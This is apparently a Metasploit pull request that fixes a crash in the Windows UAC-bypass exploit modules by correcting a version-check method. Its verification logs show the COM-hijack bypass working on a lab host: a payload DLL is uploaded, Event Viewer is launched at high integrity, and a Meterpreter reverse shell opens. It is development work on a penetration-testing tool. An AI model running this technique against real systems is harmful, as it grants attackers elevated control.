### PR TITLE
Fix bypassuac_comhijack module crash

### DIFF
--- a/modules/exploits/windows/local/bypassuac_comhijack.rb
+++ b/modules/exploits/windows/local/bypassuac_comhijack.rb
@@ -71,9 +71,9 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     version_info = get_version_info
-    vprint_status("System OS Detected: #{version_info.product}")
+    vprint_status("System OS Detected: #{version_info.product_name}")
     # return CheckCode::Safe('UAC is not enabled') unless is_uac_enabled?
-    if version_info.build_number.between?(Msf::WindowsVersion::Win7, Msf::WindowsVersion::Win10_1903)
+    if version_info.build_number.between?(::Msf::WindowsVersion::Win7_SP0, ::Msf::WindowsVersion::Win10_1903)
       return CheckCode::Appears
     end
 

--- a/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
+++ b/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
@@ -63,7 +63,6 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    get_version_info
     if is_uac_enabled?
       Exploit::CheckCode::Appears
     else


### PR DESCRIPTION
Closes https://github.com/rapid7/metasploit-framework/issues/18206

## Verification

### Before

Crash:

```
msf6 exploit(windows/local/bypassuac_comhijack) > run session=-1

[*] Started reverse TCP handler on 192.168.1.178:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit failed: NoMethodError undefined method `product' for #<Msf::WindowsVersion:0x00007ff02396de88 @_major=10, @_minor=0, @_build=14393, @_service_pack=0, @product_type=3>
Did you mean?  product_name
[*] Exploit completed, but no session was created.
```

### After

No crash, and a session opens

```
msf6 exploit(windows/local/bypassuac_comhijack) > run session=-1

[-] Handler failed to bind to 192.168.123.1:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] System OS Detected: Windows Server 2016+ Build 14393
[+] The target appears to be vulnerable.
[*] Checking admin status...
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Targeting Event Viewer via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
[*] Uploading payload to C:\Users\vagrant\AppData\Local\Temp\1\OMsoIoWd.dll ...
[*] Executing high integrity process C:\Windows\System32\eventvwr.exe
[*] Sending stage (200774 bytes) to 192.168.1.178
[+] Deleted C:\Users\vagrant\AppData\Local\Temp\1\OMsoIoWd.dll
[*] Meterpreter session 4 opened (192.168.1.178:4444 -> 192.168.1.178:55275) at 2023-07-21 16:49:25 +0100
[*] Cleaning up registry; this can take some time...

meterpreter >
```